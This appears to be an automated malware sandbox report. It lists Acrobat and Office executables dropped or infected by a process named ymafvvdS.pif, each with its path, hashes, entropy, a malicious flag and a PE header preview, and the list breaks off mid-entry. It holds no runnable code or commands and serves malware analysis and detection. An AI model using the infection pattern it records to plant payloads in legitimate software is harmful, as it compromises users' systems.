                                                                                                                                                                                                                        SHA-512:FE9AA9EE17774BBBDEE7769674DE61ECFE5D57678CF291D0F5D5AFA8FB57D8ADF1910DEC78210C5EFDD29781F87DBA5F659094FF107F122EE57EDA6F0DC23816
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@....................................a..... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1253376
                                                                                                                                                                                                                        Entropy (8bit):5.157394767815713
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:pWBWiXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:pWBWisqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:7361D092BE1C71E0FCDDA8E213F16E4E
                                                                                                                                                                                                                        SHA1:493FFAD11F8D6BE4F6F7FBAF7940BD0352379723
                                                                                                                                                                                                                        SHA-256:1952821E87DA14B5F841A5D670C634C39D81D76362A718E8F47754E5F12F0D72
                                                                                                                                                                                                                        SHA-512:053B7B0E62CD7630A089D49B1BF2EFA9F7283531F2B4261DE0B06F2DC381F962074C252BCD3B7DDF299E768D1C9EE68B0D21DFBD29B6701CABA96BFD57309307
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................`...... ..... .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1683968
                                                                                                                                                                                                                        Entropy (8bit):7.228476281408307
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:yf9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa0hsqjnhMgeiCl7G0nehbGZpbD:y+GtCi27mVTyT+a01Dmg27RnWGj
                                                                                                                                                                                                                        MD5:97B4BDE939C167C8E9BA1782FA4A8573
                                                                                                                                                                                                                        SHA1:C626D4CC7ECD27599E70EE3B1C2407576ABCDFDA
                                                                                                                                                                                                                        SHA-256:C3275A9BE9A9A2EDA79415E33B9A9671BEE4D4815D796A1D4886661EFD359213
                                                                                                                                                                                                                        SHA-512:E536C1BC3F6CB6B0C2BB1E85C5589A68FCE50B5486070A6DDE81C599493B4CC73FA8EA76D481F75D144D3F8A37A05BD24C490A534255A046E57E516E25706175
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@....................................h).... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3110912
                                                                                                                                                                                                                        Entropy (8bit):6.64965260973092
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:bU198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeY6Dmg27RnWGj:c2NfHOIK5Ns6qR9cD527BWG
                                                                                                                                                                                                                        MD5:69BB1C5C221CB8903CEA9F50923C0546
                                                                                                                                                                                                                        SHA1:D3ED446C8F83E8D07A0341288E79937F3AD52BCB
                                                                                                                                                                                                                        SHA-256:B2CC2CE9D121753110FC80D501ECAAD054A0FF40B0C9496D042E5C506ADFDB5F
                                                                                                                                                                                                                        SHA-512:31E4257D762EBE5872BA9711FDC93E40390EFE3128F3154F2342D3364C76D8A8E6298D6FD756C9D5267A92B0D51B7910E62F2DCC89EE2DB10D325957013069EE
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0......./... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1588224
                                                                                                                                                                                                                        Entropy (8bit):5.5319057712968815
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:pkcWTUQcyd+sqjnhMgeiCl7G0nehbGZpbD:phKU9Dmg27RnWGj
                                                                                                                                                                                                                        MD5:7F9378D9989C0015FAE51C16AEB2FE81
                                                                                                                                                                                                                        SHA1:DC92D74021FA51E53F26338EB46C6DB9B8F17B3E
                                                                                                                                                                                                                        SHA-256:8EF3F9CF228452CA26941DCB9EDA4354AFC20BAD614AD7F854218071A5D5E215
                                                                                                                                                                                                                        SHA-512:8A859C76C6980922B9C5FA7C50E1D05EC1B8F5150A323755FEC2E9615702B46F340084258F048A26C4182719FD6295AB21D386C2BB8529C5F62384987C260F64
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@....................................0..... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...`...@...P..................@...................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1338368
                                                                                                                                                                                                                        Entropy (8bit):5.3526400539730075
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:jfY+FUBRXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:jA+qBRsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:3329ABF2A42097FB6DF3863017E899A3
                                                                                                                                                                                                                        SHA1:272B8333D7078BB3BB791515D522EF309B868A83
                                                                                                                                                                                                                        SHA-256:C973E9BE19943E150851FCA8296B590C8962B9B1720BA193695257F11C620377
                                                                                                                                                                                                                        SHA-512:30EE141689F8A0B38E36C771B7A7E06A47AE9DD8632020734DD79D40A886E1A74CC5FE1933E64B09EE6952E2428E6B4BE8BFF4190A61773BD753E2941171457A
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@................................................................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc...p...@...`..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1143296
                                                                                                                                                                                                                        Entropy (8bit):5.022669377921799
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:6Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:6sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:DA0304899809F9490A7F354F897B2B71
                                                                                                                                                                                                                        SHA1:28BD59260782118486FCE5FB23B7F76E22C60774
                                                                                                                                                                                                                        SHA-256:215FC39818CB3D79D54846BA5EE4C9F6172347D0931BD66BB7D861B98CCE236E
                                                                                                                                                                                                                        SHA-512:B1F750D8BB9A8A61C3CB9F24A2C884BB541BB331EFA5FAEBF487808F01A63C2AE98BF69974BAD98065967CB02B6849CA62D2C891E0F79B7DB7DA4F9BC470A258
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@......................................... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...P.......@...2..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1161728
                                                                                                                                                                                                                        Entropy (8bit):5.047144910090478
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:O9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:CsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:297C29BEE0F6458B4F0F1F054465E6F6
                                                                                                                                                                                                                        SHA1:39F3FDF9F6A3E77470275A66C354EFC1B47359C0
                                                                                                                                                                                                                        SHA-256:696F03D238C0E2E91A74C872050ACF7872C3756EA36BAE5EE256333724C6C4B4
                                                                                                                                                                                                                        SHA-512:887407A6964F854FFEBD6F32DC2E47C812B2B7F6A2245D6345B0779EE4F821B0DF400A234227D8FC73BDAEF56E9092391877110C8AB9D7E7DFBE1C05EF447C2F
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@.....................................}.... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...P.......@...z..............@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4151808
                                                                                                                                                                                                                        Entropy (8bit):6.499776728228241
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:3tuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755gDmg27RN:3jEIa4HIEWOc5aD527BWG
                                                                                                                                                                                                                        MD5:BF398BE6DBBF926D9F9EB49454C00941
                                                                                                                                                                                                                        SHA1:F9CCAFBD12BBB6959BBA7E589840A1B7346D3C5E
                                                                                                                                                                                                                        SHA-256:CDBB06E7F989093F3A4656918380538B23B2BDBB5FC1EB5AAE2A9BC86D4DC159
                                                                                                                                                                                                                        SHA-512:E7DA18BC4DB758A6B275A18D900861BECDF0A80273E1B811F112ABD6B39DCD9CF05A0C6609E78F4625A4CA54C79E93B29BFBD767CAD35856C91F47AE9719B263
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):59941376
                                                                                                                                                                                                                        Entropy (8bit):7.999367296611338
                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                        SSDEEP:1572864:PQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:YXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                        MD5:D368AB07D22B032923C33B734E9395AD
                                                                                                                                                                                                                        SHA1:6419657672DF75A4E7E1709E77FF52020A5D024F
                                                                                                                                                                                                                        SHA-256:A0BB062DE8F33F1A0B387CC6EEAA2920D234D0BC7F738D0C1B135FA5FCA04E24
                                                                                                                                                                                                                        SHA-512:C65516C064BA13ECFA1218B11487F7B4D89D69BDE91E964A481276B35B88E465535B93AC8284E91A512E054487AF1474105F334174C50E16F1EAB4B6CFB1BE5F
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0............ .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1230336
                                                                                                                                                                                                                        Entropy (8bit):5.185589331627092
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:2ejVWYUA9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zjkY79sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:379EE1F6674E010E0ABBAE313A693DD7
                                                                                                                                                                                                                        SHA1:EDE2B4D2BF08DDBC5DE32F6C2271FF70D235FBC4
                                                                                                                                                                                                                        SHA-256:6D41AF299E5DE5328F913EAFC0BF7D26455D0C85466C4F2841B5E6FF720D9975
                                                                                                                                                                                                                        SHA-512:6893F6323BEF1841E679D600F268723C507B8240C29A9B8C4668AB8B46580BC7693A09BA3103A961CF9652A7CED04645053C8A2994E4A981AD863FE6A46836A5
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@.................................DQ.......................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...`.......P...v..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1384960
                                                                                                                                                                                                                        Entropy (8bit):5.377800243696428
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:yxwSJhkrmZspsqjnhMgeiCl7G0nehbGZpbD:yy+krKstDmg27RnWGj
                                                                                                                                                                                                                        MD5:7C9CC36D93794997E73896ADF1F405E8
                                                                                                                                                                                                                        SHA1:A5C2161F93A865C7E34CAF54A316D68F9D3DE173
                                                                                                                                                                                                                        SHA-256:78734CEA04DE9CF2A9B73C023BB701FE786543D17AF5BB44E2A7F707C283F262
                                                                                                                                                                                                                        SHA-512:A9B048F94717A5FA4B0D8A12E17E847A85CBDBF54F24E146B4CE55479CBF7A7D86B8806F4BF72ADF84B98E942C586DE4E1107C2392003A700C74FFF918606524
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@.....................................%.... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1649152
                                                                                                                                                                                                                        Entropy (8bit):5.632721830733146
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:mHQJLIRgvsnNosqjnhMgeiCl7G0nehbGZpbD:mHQJL34UDmg27RnWGj
                                                                                                                                                                                                                        MD5:452F9E26024687323B68D488A5189AB5
                                                                                                                                                                                                                        SHA1:698815A683673B799B2AFF5DB592E66F58974D38
                                                                                                                                                                                                                        SHA-256:9178B13B2BA74156CD9A4906600B0CC1434E37CF4FCA137ABDEA789EF5F8361F
                                                                                                                                                                                                                        SHA-512:9851BBCA52F334C3D27D7FEAB9A165E19364FA03D30980EDB5AFB621C8F96225D90E02C6BDE56A4985DEB46219C8A75C14EAE66F75A63A8A84A0E1999D9E5407
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@.......................................... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):5365760
                                                                                                                                                                                                                        Entropy (8bit):6.450965560547796
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:wUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1kn:DWmXL6DEC7dRpKuDQbgfD527BWG
                                                                                                                                                                                                                        MD5:D598343630EA50735931051B9824F083
                                                                                                                                                                                                                        SHA1:D3BE9338D1FF76033361F81BEE841E3E6F26F067
                                                                                                                                                                                                                        SHA-256:8D31790BA9701EFEF03CD66BB7DA4AE52AC6F23C6C9E5D107E736586B179418B
                                                                                                                                                                                                                        SHA-512:23591B2665AA0E876BF725AA8BD2B694474541A9A4D83249F19DE9013C1C760ED94BB7D84015A15B027EFF4640F8E47AF317FB4E93716FF7DBEBAC11014F3D65
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R......JR..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3163136
                                                                                                                                                                                                                        Entropy (8bit):7.9727802051037235
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:98304:irZ23AbsK6Ro022JjL2WEiVqJZAD527BWG:MJADmmxL2WEoCZAVQBWG
                                                                                                                                                                                                                        MD5:A4B979481449C38A93C5EF6531D15301
                                                                                                                                                                                                                        SHA1:10D3522D54F69F8E6FBD41CBF9F79DD79BEF2E91
                                                                                                                                                                                                                        SHA-256:C43CBFA7F83BFF8AC5DD24E4DE49226AF0EFBB610FA63420BC828BA85B3764B3
                                                                                                                                                                                                                        SHA-512:CEFD6C846E7DB3007312437171AB8FB2A3C835AF076927FB1176452E8AEA92391BA5C237232452210B022BB79BA96C7D91E3436C1900AFD1BB5125384E95474B
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1......u0.......... .....................................0............................!............................................... ...............................text....|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1213440
                                                                                                                                                                                                                        Entropy (8bit):7.204894655627825
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:CfrYY42wd7hlOw9fpkEE64ZsqjnhMgeiCl7G0nehbGZpbD:bz9xrSdDmg27RnWGj
                                                                                                                                                                                                                        MD5:8D8914057A818CD2331408696FA677AC
                                                                                                                                                                                                                        SHA1:B7136A6B8D963D87A39C25AE85D721C6DB7B42BB
                                                                                                                                                                                                                        SHA-256:708E83E24070EDE95672437BED150B687D20D27279CB84DE387003A0BF428363
                                                                                                                                                                                                                        SHA-512:6EEA206BB0F19077120A6593EA8465685FC9F6B560FE7E6348CB64C6C668403C412811BFEC6A9DE3E008083ED0F24349071C57FA617064C523BF593714750537
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. .......u.... ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1388544
                                                                                                                                                                                                                        Entropy (8bit):5.272917202867949
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:vwkNKiZ+R2GGNUbTF5WXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:vzNKUE5WsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:FFC2624B52EBFD4EBF7D9E3BD615BC70
